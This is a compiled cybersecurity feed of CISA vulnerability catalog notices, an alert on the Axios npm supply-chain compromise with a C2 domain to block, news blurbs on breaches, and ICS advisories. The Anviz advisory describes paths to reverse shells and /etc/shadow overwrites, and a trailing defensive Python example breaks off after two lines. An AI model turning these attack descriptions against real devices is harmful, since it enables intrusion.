- CVE-2025-48700 Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability
- CVE-2026-20122 Cisco Catalyst SD-WAN Manager Incorrect Use of Privileged APIs Vulnerability
- CVE-2026-20128 Cisco Catalyst SD-WAN Manager Storing Passwords in a Recoverable Format Vulnerability
- CVE-2026-20133 Cisco Catalyst SD-WAN Manager Exposure of Sensitive Information to an Unauthorized Actor Vulnerability

These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

0
Supply Chain Compromise Impacts Axios Node Package Manager

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this alert to provide guidance in response to the software supply chain compromise of the Axios node package manager (npm) package.[1] Axios is an HTTP client for JavaScript that developers commonly use in Node.js and browser environments.

On March 31, 2026, two versions of the Axios npm package, axios@1.14.1 and axios@0.30.4, injected the malicious dependency plain-crypto-js@4.2.1, which downloads multi-stage payloads from cyber threat actor infrastructure, including a remote access trojan.[2]

CISA urges organizations to implement the following recommendations to detect and remediate a potential compromise:
- Monitor and review code repositories, continuous integration/continuous delivery (CI/CD) pipelines, and developer machines that ran npm install or npm update with a compromised Axios version.
- Search for cached versions of affected dependencies in artifact repositories and dependency management tools.
- Pin npm package dependency versions to known safe releases.
- If compromised dependencies are identified, revert the environment to a known safe state: downgrade to axios@1.14.0 or axios@0.30.3 and delete node_modules/plain-crypto-js/.
- Rotate/revoke credentials that may have been exposed on affected systems or pipelines (e.g., version control system [VCS] tokens, CI/CD secrets, cloud keys, npm tokens, and Secure Shell [SSH] keys). For ephemeral CI jobs, rotate all secrets injected into the compromised run.
- Monitor for unexpected child processes and anomalous network behavior, specifically during npm install or npm update.
- Block and monitor outbound connections to Sfrclak[.]com domains.
- Conduct continuous indicator searches and endpoint detection and response (EDR) hunts to confirm no indicators of compromise (IOCs) remain; ensure no further egress to the command and control (C2) infrastructure.

In addition, CISA recommends organizations using Axios npm:
- Mandate phishing-resistant multifactor authentication (MFA) on all developer accounts, especially for critical platforms.
- Set ignore-scripts=true in the .npmrc configuration file, which prevents potentially malicious package scripts from executing during npm install.
- Set min-release-age=7 in the .npmrc configuration file to only install packages that have been published for at least seven days, which helps avoid installing packages that may not be completely vetted or are potentially malicious.
- Establish and maintain a baseline of normal execution behavior for tools that use Axios. Alert when a dependency behaves differently (e.g., building containers, enabling shells, executing commands) and trace outbound network activity for anomalous connections.

See the following resources for additional guidance on this compromise:
- GitHub: Post Mortem: axios npm supply chain compromise #10636
- Microsoft: Mitigating the Axios npm supply chain compromise
- StepSecurity: axios Compromised on npm - Malicious Versions Drop Remote Access Trojan
- npm Docs: Securing your code
- Socket: Supply Chain Attack on Axios Pulls Malicious Dependency from npm

Disclaimer
The information in this report is being provided "as is" for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

Notes
[1] "Post Mortem: axios npm supply chain compromise," axios GitHub, Issue #10636, March 31, 2026, https://github.com/axios/axios/issues/10636.
[2] "Mitigating the Axios npm supply chain compromise," Microsoft Threat Intelligence and Microsoft Defender Security Research Team, April 1, 2026, https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise/.

0
LayerZero says Kelp setup enabled exploit, as Aave loss questions mount

LayerZero said that Kelp’s DVN setup allowed the $290 million exploit, as investors questioned which protocol would step up to cover the shortfall.

0
Cloud hosting firm Vercel confirms ‘limited’ hack of user info

Vercel has confirmed it was compromised after a member of a hacking forum put the company’s information up for sale for $2 million.

0
Hackers impersonated eth.limo team to hijack its domain: Post-mortem

EasyDNS CEO Mark Jeftovic said the social engineering attack was highly sophisticated and the company is conducting further investigation to determine how the breach occurred.

0
Bitcoin erases weekend gains as US-Iran ceasefire faces pressure

Bitcoin briefly crashed below $74,000 on Sunday as Iran threatened retaliation for a US military seizure of an Iranian cargo ship.

0
Aave's TVL tanks $8B a day after $293M Kelp DAO hack

The Aave token fell nearly 20% to $89.5 in just over 24 hours as users withdrew billions of dollars from the lending protocol.

0
Stablecoins not a threat to banks in the near-term: Moody's analyst

A prohibition on yield-bearing stablecoins and robust payments infrastructure in the US means stablecoins will not eat into banks' market share.

0
Vercel confirms breach as hackers claim to be selling stolen data

Cloud development platform Vercel has disclosed a security incident after threat actors claimed to have breached its systems and are attempting to sell stolen data. [...]

0
Kelp exploit highlights problem with non-isolated DeFi lending: Crypto execs

The contagion from the Kelp exploit could have been contained, but at the cost of capital efficiency, according to the founder of Curve Finance.

0
Kelp restaking platform exploited, $293M drained in attack

The attack triggered a "cross-protocol contagion" that has hit at least nine crypto protocols, blockchain security firm Cyvers said.

0
Critical flaw in Protobuf library enables JavaScript code execution

Proof-of-concept exploit code has been published for a critical remote code execution flaw in protobuf.js, a widely used JavaScript implementation of Google's Protocol Buffers. [...]

0
NAKIVO v11.2: Ransomware Defense, Faster Replication, vSphere 9, and Proxmox VE 9.0 Support

NAKIVO Inc. announced the general availability of NAKIVO Backup & Replication v11.2, focused on fast, reliable, and proactive data protection. [...]

0
Man who hacked US Supreme Court filing system sentenced to probation

Nicholas Moore hacked into three U.S. government networks using stolen credentials, and then bragged about it and posted victims' personal data on Instagram under the handle @ihackedthegovernment.

0
Payouts King ransomware uses QEMU VMs to bypass endpoint security

The Payouts King ransomware is using the QEMU emulator as a reverse SSH backdoor to run hidden virtual machines on compromised systems and bypass endpoint security. [...]

0
Tycoon 2FA Phishers Scatter, Adopt Device Code Phishing

In embracing device code phishing, attackers trick victims into handing over account access by using a service's legitimate new-device login flow.

0
Hackers are abusing unpatched Windows security flaws to hack into organizations

A security researcher published details of three security vulnerabilities in Windows Defender, and the code used to exploit them. Now, hackers are taking advantage of the vulnerabilities in real-life attacks, according to a cybersecurity firm.

0
Grinex exchange blames "Western intelligence" for $13.7M crypto hack

Kyrgyzstan-based cryptocurrency exchange Grinex has suspended its operations after suffering a $13.7 million hack attributed to Western intelligence agencies. [...]

0
Every Old Vulnerability Is Now an AI Vulnerability

AI's danger isn't that it's creating new bugs, it's that it's amplifying old ones.

0
Inside an Underground Guide: How Threat Actors Vet Stolen Credit Card Shops

In cybercrime markets, trust isn't assumed, it's verified. Flare reveals how underground guides teach actors to evaluate carding shops based on data quality, reputation, and survivability. [...]

0
Webinar: From phishing to fallout — Why MSPs must rethink both security and recovery

Cyberattacks are evolving faster than many MSP and corporate defenses can keep up, with phishing driving much of today's cybercrime. Join our upcoming webinar to learn how to combine security and recovery strategies to reduce risk and maintain business continuity. [...]

0
CISA flags Apache ActiveMQ flaw as actively exploited in attacks

CISA warned that attackers are now exploiting a high-severity Apache ActiveMQ vulnerability, which was patched earlier this month after going undetected for 13 years. [...]

0
Man gets 30 months for selling thousands of hacked DraftKings accounts

23-year-old Kamerin Stokes of Memphis, Tennessee, was sentenced to 30 months in prison for selling access to tens of thousands of hacked DraftKings accounts. [...]

0
Recently leaked Windows zero-days now exploited in attacks

Threat actors are exploiting three recently disclosed Windows security vulnerabilities in attacks aimed at gaining SYSTEM or elevated administrator permissions. [...]

0
NIST Revamps CVE Framework to Focus on High-Impact Vulnerabilities

The National Institute of Standards and Technology carved a new path for vulnerability remediation by changing the way it prioritizes software flaws.

0
North Korea Uses ClickFix to Target macOS Users' Data

Sapphire Sleet uses fake job offers and phony Zoom updates to deliver ClickFix attacks that steal credentials and sensitive data from Macs.

0
Two-Factor Authentication Breaks Free from the Desktop

Threat actors know how to bypass security systems outside of traditional IT environments. Implementing 2FA could provide a needed extra security barrier in the physical world.

0
Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Taking Maestro in Stride: AI Threat Modeling Frameworks

AI agents don’t fit traditional threat models. They act like users, services, and data pipelines at once. Learn why STRIDE alone falls short, how MAESTRO fills the gaps, and why modern AI systems must be treated as insider threats.

0
AVEVA Pipeline Simulation

Summary
Successful exploitation of this vulnerability could allow an unauthenticated attacker to modify simulation parameters, training configuration and training records.

The following versions of AVEVA Pipeline Simulation are affected:
- Pipeline Simulation <=2025_SP1_build_7.1.9497.6351

CVSS v3: 9.1
Vendor: AVEVA
Equipment: AVEVA Pipeline Simulation
Vulnerabilities: Missing Authorization

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United Kingdom

Vulnerabilities

CVE-2026-5387
The vulnerability, if exploited, could allow an unauthenticated miscreant to perform operations intended only for Simulator Instructor or Simulator Developer (Administrator) roles, resulting in privilege escalation with potential for modification of simulation parameters, training configuration, and training records.
Affected Products: AVEVA Pipeline Simulation: <=2025_SP1_build_7.1.9497.6351 (Vendor: AVEVA; Product Status: known_affected)
Remediations:
- Vendor fix: All affected versions can be fixed by upgrading to AVEVA Pipeline Simulation 2025 SP1 P01 (build 7.1.9580.8513) or higher. https://softwaresupportsp.aveva.com/en-US/downloads/products/details/57b79fdb-7b5f-4125-8a44-833b6b5c6d6f
- Mitigation: For more information, please see AVEVA's security bulletin AVEVA-2026-004: https://www.aveva.com/content/dam/aveva/documents/support/cyber-security-updates/SecurityBulletin_AVEVA-2026-004.pdf
- Vendor fix: Restrict Network Access: Implement host-based and/or network firewall controls on all nodes hosting the Pipeline Simulation Server API to ensure that only trusted Pipeline Simulation client systems are permitted to establish connections.
- Mitigation: Enforce Secure Communication: Enable TLS for all API communications and ensure that server certificates are properly managed and protected to reduce the risk of manipulator-in-the-middle (MitM) attacks and tampering with data in transit.
Relevant CWE: CWE-862 Missing Authorization
Metrics: CVSS 3.1 Base Score 9.1 (CRITICAL), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Acknowledgments
AVEVA reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-04-16
Date        Revision  Summary
2026-04-16  1         Initial Republication of AVEVA-2026-004

0
CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

- CVE-2026-34197 Apache ActiveMQ Improper Input Validation Vulnerability

This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise.

Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

0
Horner Automation Cscape and XL4, XL7 PLC

Summary
Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to systems and services.

The following versions of Horner Automation Cscape and XL4, XL7 PLC are affected:
- Cscape v10.0
- XL7 PLC v15.60
- XL4 PLC v16.32.0

CVSS v3: 9.1
Vendor: Horner Automation
Equipment: Horner Automation Cscape and XL4, XL7 PLC
Vulnerabilities: Weak Password Requirements

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2026-6284
An attacker with network access to the PLC can discover passwords by brute force and gain unauthorized access to systems and services. The limited password complexity and the absence of any limit on password input attempts make brute-force password enumeration possible.
Affected Products: Horner Automation Cscape: v10.0; Horner Automation XL7 PLC: v15.60; Horner Automation XL4 PLC: v16.32.0 (Vendor: Horner Automation; Product Status: known_affected)
Remediations:
- Vendor fix: Horner Automation recommends users update to Cscape v10.2 SP2 or later. Horner Automation has also released the latest firmware for both XL4 and XL7 PLCs. Horner recommends users update to the latest version of the firmware. https://hornerautomation.com/cscape-software-free/cscape-software/
- Mitigation: For more information, see Horner Automation's release notes.
Relevant CWE: CWE-521 Weak Password Requirements
Metrics: CVSS 3.1 Base Score 9.1 (CRITICAL), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Acknowledgments
An anonymous researcher reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-04-16
Date        Revision  Summary
2026-04-16  1         Initial Publication

0
Delta Electronics ASDA-Soft

Summary
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code.

The following versions of Delta Electronics ASDA-Soft are affected:
- ASDA-Soft <=V7.2.2.0

CVSS v3: 7.8
Vendor: Delta Electronics
Equipment: Delta Electronics ASDA-Soft
Vulnerabilities: Stack-based Buffer Overflow

Background
Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Taiwan

Vulnerabilities

CVE-2026-5726
A stack-based buffer overflow vulnerability is triggered in ASDA-Soft version 7.2.0.0 during the parsing of malformed .par files.
Affected Products: Delta Electronics ASDA-Soft: <=V7.2.2.0 (Vendor: Delta Electronics; Product Status: known_affected)
Remediations:
- Vendor fix: Delta Electronics recommends users download and upgrade ASDA-Soft to v7.2.6.0 or later. If you have any product-related support concerns, contact Delta via the portal page at https://www.deltaww.com/en-US/service-support/contact-us?type=1 for any information or materials you may require.
- Mitigation: Delta Electronics provides the following general recommendations:
  - Do not click on untrusted internet links or open unsolicited attachments in emails.
  - Avoid exposing control systems and equipment to the Internet.
  - Place control system networks and remote devices behind firewalls, and isolate them from the business network.
  - When remote access is required, use a secure access method, such as a virtual private network (VPN).
- Mitigation: For more information, see Delta Electronics advisory Delta-PCSA-2026-00007 at https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00007_ASDA-Soft%20Stack-based%20Buffer%20Overflow%20Vulnerability%20(CVE-2026-5726).pdf
Relevant CWE: CWE-121 Stack-based Buffer Overflow
Metrics: CVSS 3.1 Base Score 7.8 (HIGH), Vector String CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Acknowledgments
Feng Xiong of TrendAI Zero Day Initiative reported this vulnerability to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.

Revision History
Initial Release Date: 2026-04-16
Date        Revision  Summary
2026-04-16  1         Initial Publication

0
Anviz Multiple Products

Summary
Successful exploitation of these vulnerabilities could allow attackers to conduct reconnaissance, capture or decrypt sensitive data, alter device configurations, gain unauthorized administrative or root-level access, execute arbitrary code, compromise credentials or communications, and ultimately obtain full control over affected devices.

The following versions of Anviz Multiple Products are affected:
- CX2 Lite Firmware vers:all/* (CVE-2026-32648, CVE-2026-40461, CVE-2026-35682, CVE-2026-35546, CVE-2026-40066, CVE-2026-33569)
- CX7 Firmware vers:all/* (CVE-2026-33093, CVE-2026-35061, CVE-2026-32648, CVE-2026-40461, CVE-2026-35546, CVE-2026-40066, CVE-2026-32324, CVE-2026-31927, CVE-2026-33569)
- CrossChex Standard vers:all/* (CVE-2026-40434, CVE-2026-32650)

CVSS v3: 9.8
Vendor: Anviz
Equipment: Anviz Multiple Products
Vulnerabilities: Missing Authorization, Missing Authentication for Critical Function, Improper Neutralization of Special Elements used in a Command ('Command Injection'), Download of Code Without Integrity Check, Use of Hard-coded Cryptographic Key, Relative Path Traversal, Cleartext Transmission of Sensitive Information, Improper Verification of Source of a Communication Channel, Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Background
Critical Infrastructure Sectors: Commercial Facilities, Critical Manufacturing, Defense Industrial Base, Energy, Financial Services, Food and Agriculture, Government Services and Facilities, Healthcare and Public Health, Information Technology, Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: United States

Vulnerabilities

CVE-2026-33093
CX7 is vulnerable to an unauthenticated POST to the device that captures a photo with the front facing camera, exposing visual information about the deployment environment.
Affected Products: Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-862 Missing Authorization
Metrics: CVSS 3.1 Base Score 5.3 (MEDIUM), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2026-35061
CX7 is vulnerable to the most recently captured test photo that can be retrieved without authentication, revealing sensitive operational imagery.
Affected Products: Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-862 Missing Authorization
Metrics: CVSS 3.1 Base Score 5.3 (MEDIUM), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2026-32648
CX2 Lite and CX7 are vulnerable to unauthenticated access that discloses debug configuration details (e.g., SSH/RTTY status), assisting attackers in reconnaissance against the device.
Affected Products: Anviz CX2 Lite Firmware: vers:all/*; Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-862 Missing Authorization
Metrics: CVSS 3.1 Base Score 5.3 (MEDIUM), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE-2026-40461
CX2 Lite and CX7 are vulnerable to unauthenticated POST requests that modify debug settings (e.g., enabling SSH), allowing unauthorized state changes that can facilitate later compromise.
Affected Products: Anviz CX2 Lite Firmware: vers:all/*; Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS 3.1 Base Score 7.5 (HIGH), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2026-35682
CX2 Lite is vulnerable to an authenticated command injection via a filename parameter that enables arbitrary command execution (e.g., starting telnetd), resulting in root-level access.
Affected Products: Anviz CX2 Lite Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')
Metrics: CVSS 3.1 Base Score 8.8 (HIGH), Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2026-35546
CX2 Lite and CX7 are vulnerable to unauthenticated firmware uploads. This causes crafted archives to be accepted, enabling attackers to plant and execute code and obtain a reverse shell.
Affected Products: Anviz CX2 Lite Firmware: vers:all/*; Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS 3.1 Base Score 9.8 (CRITICAL), Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2026-40066
CX2 Lite and CX7 are vulnerable to unverified update packages that can be uploaded. The device unpacks and executes a script resulting in unauthenticated remote code execution.
Affected Products: Anviz CX2 Lite Firmware: vers:all/*; Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html
Relevant CWE: CWE-494 Download of Code Without Integrity Check
Metrics: CVSS 3.1 Base Score 8.8 (HIGH), Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2026-32324
CX7 is vulnerable because the application embeds reusable certificate/key material, enabling decryption of MQTT traffic and potential interaction with device messaging channels at scale.
Affected Products: Anviz CX7 Firmware: vers:all/* (Vendor: Anviz; Product Status: known_affected)
Mitigation: Anviz did not respond to CISA's attempts to coordinate these vulnerabilities.
Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-321 Use of Hard-coded Cryptographic Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.7 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N CVE-2026-31927 CX7 is vulnerable to an authenticated CSV upload which allows path traversal to overwrite arbitrary files (e.g., /etc/shadow), enabling unauthorized SSH access when combined with debug‑setting changes. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-23 Relative Path Traversal Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N CVE-2026-33569 CX2 Lite and CX7 administrative sessions occur over HTTP, enabling on‑path attackers to sniff credentials and session data, which can be used to compromise the device. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CX2 Lite Firmware: vers:all/*, Anviz CX7 Firmware: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. 
https://www.anviz.com/contact-us.html Relevant CWE: CWE-319 Cleartext Transmission of Sensitive Information Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N CVE-2026-40434 CrossChex Standard lacks source verification in the client/server channel, enabling TCP packet injection by an attacker on the same network to alter or disrupt application traffic. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CrossChex Standard: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. https://www.anviz.com/contact-us.html Relevant CWE: CWE-940 Improper Verification of Source of a Communication Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-32650 CrossChex Standard is vulnerable when an attacker manipulates the TDS7 PreLogin to disable encryption, causing database credentials to be sent in plaintext and enabling unauthorized database access. View CVE Details Affected Products Anviz Multiple Products Vendor: Anviz Product Version: Anviz CrossChex Standard: vers:all/* Product Status: known_affected Remediations Mitigation Anviz did not respond to CISA's attempts to coordinate these vulnerabilities. Users should contact Anviz for more information at https://www.anviz.com/contact-us.html. 
https://www.anviz.com/contact-us.html Relevant CWE: CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments An anonymous researcher reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. 
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-16 Date Revision Summary 2026-04-16 1 Initial Publication Legal Notice and Terms of Use
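For the CrossChex Standard downgrade (CVE-2026-32650 in the Anviz advisory above), the check that matters sits in the TDS client: it must refuse to send its LOGIN7 packet unless the server's PRELOGIN reply actually commits to encryption, because an on-path attacker can rewrite that reply before the client sees it. The block below is an added example, not Anviz's, Microsoft's or CISA's code. It parses a PRELOGIN packet using the option-token layout documented in MS-TDS, extracts the ENCRYPTION option and applies a fail-closed policy that is deliberately stricter than the protocol's own negotiation table. The sample packets are constructed inline by build_prelogin (dummy VERSION bytes), and rewrite_encryption only models the single-byte change an on-path attacker makes to the server's answer.

```python
import struct

PRELOGIN_PACKET_TYPE = 0x12
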